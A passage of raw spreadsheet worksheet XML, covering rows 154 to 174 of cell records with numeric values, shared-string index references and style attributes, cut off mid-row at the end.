      <c r="X154" s="45"/>
      <c r="Y154" s="45"/>
      <c r="Z154" s="38" t="s">
        <v>1574</v>
      </c>
      <c r="AA154" s="39" t="s">
        <v>1575</v>
      </c>
      <c r="AB154" s="38" t="s">
        <v>1576</v>
      </c>
      <c r="AC154" s="40">
        <v>108230.0</v>
      </c>
      <c r="AD154" s="5"/>
      <c r="AE154" s="14"/>
      <c r="AF154" s="14"/>
    </row>
    <row r="155">
      <c r="A155" s="6">
        <f t="shared" si="1"/>
        <v>0.2423795894</v>
      </c>
      <c r="B155" s="29">
        <v>1.0</v>
      </c>
      <c r="C155" s="29">
        <v>32403.0</v>
      </c>
      <c r="D155" s="14"/>
      <c r="E155" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F155" s="14"/>
      <c r="G155" s="29">
        <v>4.0</v>
      </c>
      <c r="H155" s="29">
        <v>3021.0</v>
      </c>
      <c r="I155" s="29">
        <v>21831.0</v>
      </c>
      <c r="J155" s="15"/>
      <c r="K155" s="15"/>
      <c r="L155" s="15"/>
      <c r="M155" s="15"/>
      <c r="N155" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O155" s="29">
        <v>3.0</v>
      </c>
      <c r="P155" s="29">
        <v>2.0</v>
      </c>
      <c r="Q155" s="15"/>
      <c r="R155" s="15"/>
      <c r="S155" s="15"/>
      <c r="T155" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U155" s="5"/>
      <c r="V155" s="5"/>
      <c r="W155" s="47"/>
      <c r="X155" s="45"/>
      <c r="Y155" s="45"/>
      <c r="Z155" s="38" t="s">
        <v>1577</v>
      </c>
      <c r="AA155" s="39" t="s">
        <v>1578</v>
      </c>
      <c r="AB155" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC155" s="40">
        <v>32401.0</v>
      </c>
      <c r="AD155" s="5"/>
      <c r="AE155" s="14"/>
      <c r="AF155" s="14"/>
    </row>
    <row r="156">
      <c r="A156" s="6">
        <f t="shared" si="1"/>
        <v>0.02043160524</v>
      </c>
      <c r="B156" s="29">
        <v>1.0</v>
      </c>
      <c r="C156" s="15"/>
      <c r="D156" s="14"/>
      <c r="E156" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F156" s="14"/>
      <c r="G156" s="29">
        <v>1.0</v>
      </c>
      <c r="H156" s="29">
        <v>251.0</v>
      </c>
      <c r="I156" s="29">
        <v>289757.0</v>
      </c>
      <c r="J156" s="15"/>
      <c r="K156" s="29">
        <v>59503.0</v>
      </c>
      <c r="L156" s="15"/>
      <c r="M156" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N156" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O156" s="29">
        <v>0.0</v>
      </c>
      <c r="P156" s="29">
        <v>1.0</v>
      </c>
      <c r="Q156" s="15"/>
      <c r="R156" s="15"/>
      <c r="S156" s="15"/>
      <c r="T156" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U156" s="5"/>
      <c r="V156" s="5"/>
      <c r="W156" s="47"/>
      <c r="X156" s="45"/>
      <c r="Y156" s="45"/>
      <c r="Z156" s="38" t="s">
        <v>1579</v>
      </c>
      <c r="AA156" s="39" t="s">
        <v>1580</v>
      </c>
      <c r="AB156" s="38" t="s">
        <v>1581</v>
      </c>
      <c r="AC156" s="40">
        <v>268655.0</v>
      </c>
      <c r="AD156" s="5"/>
      <c r="AE156" s="14"/>
      <c r="AF156" s="14"/>
    </row>
    <row r="157">
      <c r="A157" s="6">
        <f t="shared" si="1"/>
        <v>0.07916685554</v>
      </c>
      <c r="B157" s="29">
        <v>1.0</v>
      </c>
      <c r="C157" s="14"/>
      <c r="D157" s="14"/>
      <c r="E157" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F157" s="14"/>
      <c r="G157" s="29">
        <v>2.0</v>
      </c>
      <c r="H157" s="29">
        <v>279.0</v>
      </c>
      <c r="I157" s="29">
        <v>183383.0</v>
      </c>
      <c r="J157" s="15"/>
      <c r="K157" s="15"/>
      <c r="L157" s="15"/>
      <c r="M157" s="14"/>
      <c r="N157" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O157" s="29">
        <v>1.0</v>
      </c>
      <c r="P157" s="29">
        <v>0.0</v>
      </c>
      <c r="Q157" s="15"/>
      <c r="R157" s="15"/>
      <c r="S157" s="15"/>
      <c r="T157" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U157" s="5"/>
      <c r="V157" s="5"/>
      <c r="W157" s="47"/>
      <c r="X157" s="45"/>
      <c r="Y157" s="45"/>
      <c r="Z157" s="38" t="s">
        <v>1582</v>
      </c>
      <c r="AA157" s="39" t="s">
        <v>1583</v>
      </c>
      <c r="AB157" s="38" t="s">
        <v>1584</v>
      </c>
      <c r="AC157" s="40">
        <v>190804.0</v>
      </c>
      <c r="AD157" s="5"/>
      <c r="AE157" s="14"/>
      <c r="AF157" s="14"/>
    </row>
    <row r="158">
      <c r="A158" s="6">
        <f t="shared" si="1"/>
        <v>0.2532926016</v>
      </c>
      <c r="B158" s="29">
        <v>1.0</v>
      </c>
      <c r="C158" s="29">
        <v>155154.0</v>
      </c>
      <c r="D158" s="14"/>
      <c r="E158" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F158" s="14"/>
      <c r="G158" s="29">
        <v>4.0</v>
      </c>
      <c r="H158" s="29">
        <v>697.0</v>
      </c>
      <c r="I158" s="29">
        <v>91316.0</v>
      </c>
      <c r="J158" s="15"/>
      <c r="K158" s="29">
        <v>91316.0</v>
      </c>
      <c r="L158" s="15"/>
      <c r="M158" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N158" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O158" s="29">
        <v>2.0</v>
      </c>
      <c r="P158" s="29">
        <v>0.0</v>
      </c>
      <c r="Q158" s="15"/>
      <c r="R158" s="15"/>
      <c r="S158" s="15"/>
      <c r="T158" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U158" s="5"/>
      <c r="V158" s="5"/>
      <c r="W158" s="47"/>
      <c r="X158" s="45"/>
      <c r="Y158" s="45"/>
      <c r="Z158" s="38" t="s">
        <v>1585</v>
      </c>
      <c r="AA158" s="39" t="s">
        <v>1586</v>
      </c>
      <c r="AB158" s="38" t="s">
        <v>1587</v>
      </c>
      <c r="AC158" s="40">
        <v>155153.0</v>
      </c>
      <c r="AD158" s="5"/>
      <c r="AE158" s="14"/>
      <c r="AF158" s="14"/>
    </row>
    <row r="159">
      <c r="A159" s="6">
        <f t="shared" si="1"/>
        <v>0.2514458923</v>
      </c>
      <c r="B159" s="29">
        <v>1.0</v>
      </c>
      <c r="C159" s="29">
        <v>84698.0</v>
      </c>
      <c r="D159" s="14"/>
      <c r="E159" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F159" s="14"/>
      <c r="G159" s="29">
        <v>2.0</v>
      </c>
      <c r="H159" s="29">
        <v>520.0</v>
      </c>
      <c r="I159" s="29">
        <v>60068.0</v>
      </c>
      <c r="J159" s="15"/>
      <c r="K159" s="29">
        <v>60068.0</v>
      </c>
      <c r="L159" s="15"/>
      <c r="M159" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N159" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O159" s="29">
        <v>2.0</v>
      </c>
      <c r="P159" s="29">
        <v>2.0</v>
      </c>
      <c r="Q159" s="15"/>
      <c r="R159" s="15"/>
      <c r="S159" s="15"/>
      <c r="T159" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U159" s="5"/>
      <c r="V159" s="5"/>
      <c r="W159" s="47"/>
      <c r="X159" s="45"/>
      <c r="Y159" s="45"/>
      <c r="Z159" s="38" t="s">
        <v>1588</v>
      </c>
      <c r="AA159" s="39" t="s">
        <v>1589</v>
      </c>
      <c r="AB159" s="38" t="s">
        <v>1590</v>
      </c>
      <c r="AC159" s="40">
        <v>84697.0</v>
      </c>
      <c r="AD159" s="5"/>
      <c r="AE159" s="14"/>
      <c r="AF159" s="14"/>
    </row>
    <row r="160">
      <c r="A160" s="6">
        <f t="shared" si="1"/>
        <v>0.3822758466</v>
      </c>
      <c r="B160" s="29">
        <v>1.0</v>
      </c>
      <c r="C160" s="14"/>
      <c r="D160" s="14"/>
      <c r="E160" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F160" s="14"/>
      <c r="G160" s="29">
        <v>-3.0</v>
      </c>
      <c r="H160" s="29">
        <v>6261.0</v>
      </c>
      <c r="I160" s="29">
        <v>60011.0</v>
      </c>
      <c r="J160" s="15"/>
      <c r="K160" s="29">
        <v>60011.0</v>
      </c>
      <c r="L160" s="15"/>
      <c r="M160" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N160" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O160" s="29">
        <v>1.0</v>
      </c>
      <c r="P160" s="29">
        <v>3.0</v>
      </c>
      <c r="Q160" s="15"/>
      <c r="R160" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S160" s="15"/>
      <c r="T160" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U160" s="5"/>
      <c r="V160" s="5"/>
      <c r="W160" s="47"/>
      <c r="X160" s="45"/>
      <c r="Y160" s="45"/>
      <c r="Z160" s="38" t="s">
        <v>1591</v>
      </c>
      <c r="AA160" s="39" t="s">
        <v>1592</v>
      </c>
      <c r="AB160" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC160" s="40">
        <v>72315.0</v>
      </c>
      <c r="AD160" s="5"/>
      <c r="AE160" s="14"/>
      <c r="AF160" s="14"/>
    </row>
    <row r="161">
      <c r="A161" s="6">
        <f t="shared" si="1"/>
        <v>0.8227479578</v>
      </c>
      <c r="B161" s="29">
        <v>1.0</v>
      </c>
      <c r="C161" s="15"/>
      <c r="D161" s="14"/>
      <c r="E161" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F161" s="14"/>
      <c r="G161" s="29">
        <v>0.0</v>
      </c>
      <c r="H161" s="29">
        <v>1641.0</v>
      </c>
      <c r="I161" s="29">
        <v>102221.0</v>
      </c>
      <c r="J161" s="15"/>
      <c r="K161" s="29">
        <v>29252.0</v>
      </c>
      <c r="L161" s="15"/>
      <c r="M161" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N161" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O161" s="29">
        <v>1.0</v>
      </c>
      <c r="P161" s="29">
        <v>0.0</v>
      </c>
      <c r="Q161" s="15"/>
      <c r="R161" s="15"/>
      <c r="S161" s="15"/>
      <c r="T161" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U161" s="5"/>
      <c r="V161" s="5"/>
      <c r="W161" s="47"/>
      <c r="X161" s="45"/>
      <c r="Y161" s="45"/>
      <c r="Z161" s="38" t="s">
        <v>1593</v>
      </c>
      <c r="AA161" s="39" t="s">
        <v>1594</v>
      </c>
      <c r="AB161" s="38" t="s">
        <v>1595</v>
      </c>
      <c r="AC161" s="40">
        <v>202159.0</v>
      </c>
      <c r="AD161" s="5"/>
      <c r="AE161" s="14"/>
      <c r="AF161" s="14"/>
    </row>
    <row r="162">
      <c r="A162" s="6">
        <f t="shared" si="1"/>
        <v>0.4607985971</v>
      </c>
      <c r="B162" s="29">
        <v>1.0</v>
      </c>
      <c r="C162" s="15"/>
      <c r="D162" s="14"/>
      <c r="E162" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F162" s="14"/>
      <c r="G162" s="29">
        <v>0.0</v>
      </c>
      <c r="H162" s="29">
        <v>190.0</v>
      </c>
      <c r="I162" s="29">
        <v>237014.0</v>
      </c>
      <c r="J162" s="15"/>
      <c r="K162" s="15"/>
      <c r="L162" s="15"/>
      <c r="M162" s="15"/>
      <c r="N162" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O162" s="29">
        <v>1.0</v>
      </c>
      <c r="P162" s="29">
        <v>8.0</v>
      </c>
      <c r="Q162" s="15"/>
      <c r="R162" s="15"/>
      <c r="S162" s="15"/>
      <c r="T162" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U162" s="5"/>
      <c r="V162" s="5"/>
      <c r="W162" s="47"/>
      <c r="X162" s="45"/>
      <c r="Y162" s="45"/>
      <c r="Z162" s="38" t="s">
        <v>1596</v>
      </c>
      <c r="AA162" s="39" t="s">
        <v>1597</v>
      </c>
      <c r="AB162" s="38" t="s">
        <v>1418</v>
      </c>
      <c r="AC162" s="40">
        <v>233583.0</v>
      </c>
      <c r="AD162" s="5"/>
      <c r="AE162" s="14"/>
      <c r="AF162" s="14"/>
    </row>
    <row r="163">
      <c r="A163" s="6">
        <f t="shared" si="1"/>
        <v>0.1166974483</v>
      </c>
      <c r="B163" s="29">
        <v>1.0</v>
      </c>
      <c r="C163" s="14"/>
      <c r="D163" s="14"/>
      <c r="E163" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F163" s="14"/>
      <c r="G163" s="29">
        <v>6.0</v>
      </c>
      <c r="H163" s="29">
        <v>1008.0</v>
      </c>
      <c r="I163" s="29">
        <v>47381.0</v>
      </c>
      <c r="J163" s="15"/>
      <c r="K163" s="29">
        <v>47381.0</v>
      </c>
      <c r="L163" s="15"/>
      <c r="M163" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N163" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O163" s="29">
        <v>3.0</v>
      </c>
      <c r="P163" s="29">
        <v>3.0</v>
      </c>
      <c r="Q163" s="15"/>
      <c r="R163" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S163" s="15"/>
      <c r="T163" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U163" s="5"/>
      <c r="V163" s="5"/>
      <c r="W163" s="47"/>
      <c r="X163" s="45"/>
      <c r="Y163" s="45"/>
      <c r="Z163" s="38" t="s">
        <v>1598</v>
      </c>
      <c r="AA163" s="39" t="s">
        <v>1599</v>
      </c>
      <c r="AB163" s="38" t="s">
        <v>1600</v>
      </c>
      <c r="AC163" s="40">
        <v>209342.0</v>
      </c>
      <c r="AD163" s="5"/>
      <c r="AE163" s="14"/>
      <c r="AF163" s="14"/>
    </row>
    <row r="164">
      <c r="A164" s="6">
        <f t="shared" si="1"/>
        <v>0.03461120874</v>
      </c>
      <c r="B164" s="29">
        <v>1.0</v>
      </c>
      <c r="C164" s="29">
        <v>211100.0</v>
      </c>
      <c r="D164" s="14"/>
      <c r="E164" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F164" s="14"/>
      <c r="G164" s="29">
        <v>0.0</v>
      </c>
      <c r="H164" s="29">
        <v>637.0</v>
      </c>
      <c r="I164" s="29">
        <v>147210.0</v>
      </c>
      <c r="J164" s="15"/>
      <c r="K164" s="15"/>
      <c r="L164" s="15"/>
      <c r="M164" s="14"/>
      <c r="N164" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O164" s="29">
        <v>1.0</v>
      </c>
      <c r="P164" s="29">
        <v>0.0</v>
      </c>
      <c r="Q164" s="15"/>
      <c r="R164" s="15"/>
      <c r="S164" s="15"/>
      <c r="T164" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U164" s="5"/>
      <c r="V164" s="5"/>
      <c r="W164" s="45"/>
      <c r="X164" s="45"/>
      <c r="Y164" s="45"/>
      <c r="Z164" s="38" t="s">
        <v>1601</v>
      </c>
      <c r="AA164" s="39" t="s">
        <v>1602</v>
      </c>
      <c r="AB164" s="38" t="s">
        <v>1603</v>
      </c>
      <c r="AC164" s="40">
        <v>211094.0</v>
      </c>
      <c r="AD164" s="5"/>
      <c r="AE164" s="14"/>
      <c r="AF164" s="14"/>
    </row>
    <row r="165">
      <c r="A165" s="6">
        <f t="shared" si="1"/>
        <v>0.5943119906</v>
      </c>
      <c r="B165" s="29">
        <v>1.0</v>
      </c>
      <c r="C165" s="14"/>
      <c r="D165" s="14"/>
      <c r="E165" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F165" s="14"/>
      <c r="G165" s="29">
        <v>47.0</v>
      </c>
      <c r="H165" s="29">
        <v>11757.0</v>
      </c>
      <c r="I165" s="29">
        <v>1719.0</v>
      </c>
      <c r="J165" s="15"/>
      <c r="K165" s="29">
        <v>171670.0</v>
      </c>
      <c r="L165" s="15"/>
      <c r="M165" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N165" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O165" s="29">
        <v>5.0</v>
      </c>
      <c r="P165" s="29">
        <v>10.0</v>
      </c>
      <c r="Q165" s="15"/>
      <c r="R165" s="15"/>
      <c r="S165" s="15"/>
      <c r="T165" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U165" s="5"/>
      <c r="V165" s="5"/>
      <c r="W165" s="45"/>
      <c r="X165" s="45"/>
      <c r="Y165" s="45"/>
      <c r="Z165" s="38" t="s">
        <v>1604</v>
      </c>
      <c r="AA165" s="39" t="s">
        <v>1605</v>
      </c>
      <c r="AB165" s="38" t="s">
        <v>1606</v>
      </c>
      <c r="AC165" s="40">
        <v>4729.0</v>
      </c>
      <c r="AD165" s="5"/>
      <c r="AE165" s="14"/>
      <c r="AF165" s="14"/>
    </row>
    <row r="166">
      <c r="A166" s="6">
        <f t="shared" si="1"/>
        <v>0.5585127101</v>
      </c>
      <c r="B166" s="29">
        <v>1.0</v>
      </c>
      <c r="C166" s="14"/>
      <c r="D166" s="14"/>
      <c r="E166" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F166" s="14"/>
      <c r="G166" s="29">
        <v>2.0</v>
      </c>
      <c r="H166" s="29">
        <v>63.0</v>
      </c>
      <c r="I166" s="29">
        <v>183527.0</v>
      </c>
      <c r="J166" s="15"/>
      <c r="K166" s="15"/>
      <c r="L166" s="15"/>
      <c r="M166" s="15"/>
      <c r="N166" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O166" s="29">
        <v>0.0</v>
      </c>
      <c r="P166" s="29">
        <v>3.0</v>
      </c>
      <c r="Q166" s="15"/>
      <c r="R166" s="15"/>
      <c r="S166" s="15"/>
      <c r="T166" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U166" s="5"/>
      <c r="V166" s="5"/>
      <c r="W166" s="47"/>
      <c r="X166" s="45"/>
      <c r="Y166" s="45"/>
      <c r="Z166" s="38" t="s">
        <v>1607</v>
      </c>
      <c r="AA166" s="39" t="s">
        <v>1608</v>
      </c>
      <c r="AB166" s="38" t="s">
        <v>1609</v>
      </c>
      <c r="AC166" s="40">
        <v>232233.0</v>
      </c>
      <c r="AD166" s="5"/>
      <c r="AE166" s="14"/>
      <c r="AF166" s="14"/>
    </row>
    <row r="167">
      <c r="A167" s="6">
        <f t="shared" si="1"/>
        <v>0.6726018242</v>
      </c>
      <c r="B167" s="29">
        <v>1.0</v>
      </c>
      <c r="C167" s="29">
        <v>197384.0</v>
      </c>
      <c r="D167" s="14"/>
      <c r="E167" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F167" s="14"/>
      <c r="G167" s="29">
        <v>5.0</v>
      </c>
      <c r="H167" s="29">
        <v>971.0</v>
      </c>
      <c r="I167" s="29">
        <v>67046.0</v>
      </c>
      <c r="J167" s="15"/>
      <c r="K167" s="15"/>
      <c r="L167" s="15"/>
      <c r="M167" s="14"/>
      <c r="N167" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O167" s="29">
        <v>1.0</v>
      </c>
      <c r="P167" s="29">
        <v>4.0</v>
      </c>
      <c r="Q167" s="15"/>
      <c r="R167" s="15"/>
      <c r="S167" s="15"/>
      <c r="T167" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U167" s="5"/>
      <c r="V167" s="5"/>
      <c r="W167" s="47"/>
      <c r="X167" s="45"/>
      <c r="Y167" s="45"/>
      <c r="Z167" s="38" t="s">
        <v>1610</v>
      </c>
      <c r="AA167" s="39" t="s">
        <v>1611</v>
      </c>
      <c r="AB167" s="38" t="s">
        <v>1612</v>
      </c>
      <c r="AC167" s="40">
        <v>189688.0</v>
      </c>
      <c r="AD167" s="5"/>
      <c r="AE167" s="14"/>
      <c r="AF167" s="14"/>
    </row>
    <row r="168">
      <c r="A168" s="6">
        <f t="shared" si="1"/>
        <v>0.4698597658</v>
      </c>
      <c r="B168" s="29">
        <v>1.0</v>
      </c>
      <c r="C168" s="29">
        <v>3432.0</v>
      </c>
      <c r="D168" s="14"/>
      <c r="E168" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F168" s="14"/>
      <c r="G168" s="29">
        <v>24.0</v>
      </c>
      <c r="H168" s="29">
        <v>4553.0</v>
      </c>
      <c r="I168" s="29">
        <v>953.0</v>
      </c>
      <c r="J168" s="15"/>
      <c r="K168" s="29">
        <v>953.0</v>
      </c>
      <c r="L168" s="15"/>
      <c r="M168" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N168" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O168" s="29">
        <v>4.0</v>
      </c>
      <c r="P168" s="29">
        <v>4.0</v>
      </c>
      <c r="Q168" s="15"/>
      <c r="R168" s="15"/>
      <c r="S168" s="15"/>
      <c r="T168" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U168" s="5"/>
      <c r="V168" s="5"/>
      <c r="W168" s="45"/>
      <c r="X168" s="45"/>
      <c r="Y168" s="45"/>
      <c r="Z168" s="38" t="s">
        <v>1613</v>
      </c>
      <c r="AA168" s="39" t="s">
        <v>1614</v>
      </c>
      <c r="AB168" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC168" s="40">
        <v>3374.0</v>
      </c>
      <c r="AD168" s="5"/>
      <c r="AE168" s="14"/>
      <c r="AF168" s="14"/>
    </row>
    <row r="169">
      <c r="A169" s="6">
        <f t="shared" si="1"/>
        <v>0.7409349727</v>
      </c>
      <c r="B169" s="29">
        <v>1.0</v>
      </c>
      <c r="C169" s="15"/>
      <c r="D169" s="14"/>
      <c r="E169" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F169" s="14"/>
      <c r="G169" s="29">
        <v>16.0</v>
      </c>
      <c r="H169" s="29">
        <v>1092.0</v>
      </c>
      <c r="I169" s="29">
        <v>190834.0</v>
      </c>
      <c r="J169" s="15"/>
      <c r="K169" s="29">
        <v>190834.0</v>
      </c>
      <c r="L169" s="15"/>
      <c r="M169" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N169" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O169" s="29">
        <v>3.0</v>
      </c>
      <c r="P169" s="29">
        <v>7.0</v>
      </c>
      <c r="Q169" s="15"/>
      <c r="R169" s="15"/>
      <c r="S169" s="15"/>
      <c r="T169" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U169" s="5"/>
      <c r="V169" s="5"/>
      <c r="W169" s="47"/>
      <c r="X169" s="45"/>
      <c r="Y169" s="45"/>
      <c r="Z169" s="38" t="s">
        <v>1615</v>
      </c>
      <c r="AA169" s="39" t="s">
        <v>1616</v>
      </c>
      <c r="AB169" s="38" t="s">
        <v>1617</v>
      </c>
      <c r="AC169" s="40">
        <v>197255.0</v>
      </c>
      <c r="AD169" s="5"/>
      <c r="AE169" s="14"/>
      <c r="AF169" s="14"/>
    </row>
    <row r="170">
      <c r="A170" s="6">
        <f t="shared" si="1"/>
        <v>0.9011592015</v>
      </c>
      <c r="B170" s="29">
        <v>1.0</v>
      </c>
      <c r="C170" s="15"/>
      <c r="D170" s="14"/>
      <c r="E170" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F170" s="14"/>
      <c r="G170" s="29">
        <v>7.0</v>
      </c>
      <c r="H170" s="29">
        <v>1812.0</v>
      </c>
      <c r="I170" s="29">
        <v>89214.0</v>
      </c>
      <c r="J170" s="15"/>
      <c r="K170" s="29">
        <v>89214.0</v>
      </c>
      <c r="L170" s="15"/>
      <c r="M170" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N170" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O170" s="29">
        <v>3.0</v>
      </c>
      <c r="P170" s="29">
        <v>1.0</v>
      </c>
      <c r="Q170" s="15"/>
      <c r="R170" s="15"/>
      <c r="S170" s="15"/>
      <c r="T170" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U170" s="5"/>
      <c r="V170" s="5"/>
      <c r="W170" s="47"/>
      <c r="X170" s="45"/>
      <c r="Y170" s="45"/>
      <c r="Z170" s="38" t="s">
        <v>1618</v>
      </c>
      <c r="AA170" s="39" t="s">
        <v>1619</v>
      </c>
      <c r="AB170" s="38" t="s">
        <v>1620</v>
      </c>
      <c r="AC170" s="40">
        <v>180697.0</v>
      </c>
      <c r="AD170" s="5"/>
      <c r="AE170" s="14"/>
      <c r="AF170" s="14"/>
    </row>
    <row r="171">
      <c r="A171" s="6">
        <f t="shared" si="1"/>
        <v>0.6793674086</v>
      </c>
      <c r="B171" s="29">
        <v>1.0</v>
      </c>
      <c r="C171" s="15"/>
      <c r="D171" s="14"/>
      <c r="E171" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F171" s="14"/>
      <c r="G171" s="29">
        <v>20.0</v>
      </c>
      <c r="H171" s="29">
        <v>2494.0</v>
      </c>
      <c r="I171" s="29">
        <v>49637.0</v>
      </c>
      <c r="J171" s="15"/>
      <c r="K171" s="15"/>
      <c r="L171" s="15"/>
      <c r="M171" s="15"/>
      <c r="N171" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O171" s="29">
        <v>7.0</v>
      </c>
      <c r="P171" s="29">
        <v>4.0</v>
      </c>
      <c r="Q171" s="15"/>
      <c r="R171" s="15"/>
      <c r="S171" s="15"/>
      <c r="T171" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U171" s="5"/>
      <c r="V171" s="5"/>
      <c r="W171" s="47"/>
      <c r="X171" s="45"/>
      <c r="Y171" s="45"/>
      <c r="Z171" s="38" t="s">
        <v>1621</v>
      </c>
      <c r="AA171" s="39" t="s">
        <v>1622</v>
      </c>
      <c r="AB171" s="38" t="s">
        <v>1623</v>
      </c>
      <c r="AC171" s="40">
        <v>61734.0</v>
      </c>
      <c r="AD171" s="5"/>
      <c r="AE171" s="14"/>
      <c r="AF171" s="14"/>
    </row>
    <row r="172">
      <c r="A172" s="6">
        <f t="shared" si="1"/>
        <v>0.2232977677</v>
      </c>
      <c r="B172" s="29">
        <v>1.0</v>
      </c>
      <c r="C172" s="29">
        <v>106129.0</v>
      </c>
      <c r="D172" s="14"/>
      <c r="E172" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F172" s="14"/>
      <c r="G172" s="29">
        <v>0.0</v>
      </c>
      <c r="H172" s="29">
        <v>2105.0</v>
      </c>
      <c r="I172" s="29">
        <v>92533.0</v>
      </c>
      <c r="J172" s="15"/>
      <c r="K172" s="15"/>
      <c r="L172" s="15"/>
      <c r="M172" s="14"/>
      <c r="N172" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O172" s="29">
        <v>1.0</v>
      </c>
      <c r="P172" s="29">
        <v>1.0</v>
      </c>
      <c r="Q172" s="15"/>
      <c r="R172" s="15"/>
      <c r="S172" s="15"/>
      <c r="T172" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U172" s="5"/>
      <c r="V172" s="5"/>
      <c r="W172" s="47"/>
      <c r="X172" s="45"/>
      <c r="Y172" s="45"/>
      <c r="Z172" s="38" t="s">
        <v>1624</v>
      </c>
      <c r="AA172" s="39" t="s">
        <v>1625</v>
      </c>
      <c r="AB172" s="38" t="s">
        <v>1626</v>
      </c>
      <c r="AC172" s="40">
        <v>106127.0</v>
      </c>
      <c r="AD172" s="5"/>
      <c r="AE172" s="14"/>
      <c r="AF172" s="14"/>
    </row>
    <row r="173">
      <c r="A173" s="6">
        <f t="shared" si="1"/>
        <v>0.8686273757</v>
      </c>
      <c r="B173" s="29">
        <v>1.0</v>
      </c>
      <c r="C173" s="29">
        <v>52470.0</v>
      </c>
      <c r="D173" s="14"/>
      <c r="E173" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F173" s="14"/>
      <c r="G173" s="29">
        <v>3.0</v>
      </c>
      <c r="H173" s="29">
        <v>990.0</v>
      </c>
      <c r="I173" s="29">
        <v>26331.0</v>
      </c>
      <c r="J173" s="15"/>
      <c r="K173" s="29">
        <v>-1.0</v>
      </c>
      <c r="L173" s="15"/>
      <c r="M173" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N173" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O173" s="29">
        <v>2.0</v>
      </c>
      <c r="P173" s="29">
        <v>0.0</v>
      </c>
      <c r="Q173" s="15"/>
      <c r="R173" s="15"/>
      <c r="S173" s="15"/>
      <c r="T173" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U173" s="5"/>
      <c r="V173" s="5"/>
      <c r="W173" s="47"/>
      <c r="X173" s="45"/>
      <c r="Y173" s="45"/>
      <c r="Z173" s="38" t="s">
        <v>1627</v>
      </c>
      <c r="AA173" s="39" t="s">
        <v>1628</v>
      </c>
      <c r="AB173" s="38" t="s">
        <v>1629</v>
      </c>
      <c r="AC173" s="40">
        <v>52464.0</v>
      </c>
      <c r="AD173" s="5"/>
      <c r="AE173" s="14"/>
      <c r="AF173" s="14"/>
    </row>
    <row r="174">
      <c r="A174" s="6">
        <f t="shared" si="1"/>
        <v>0.4408917367</v>
      </c>
      <c r="B174" s="29">
        <v>1.0</v>
      </c>
      <c r="C174" s="14"/>
      <c r="D174" s="14"/>
      <c r="E174" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F174" s="14"/>
      <c r="G174" s="29">
        <v>1.0</v>
      </c>
      <c r="H174" s="29">
        <v>75.0</v>
      </c>
      <c r="I174" s="29">
        <v>32944.0</v>
      </c>
      <c r="J174" s="15"/>
      <c r="K174" s="15"/>
      <c r="L174" s="15"/>
      <c r="M174" s="15"/>
      <c r="N174" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O174" s="29">
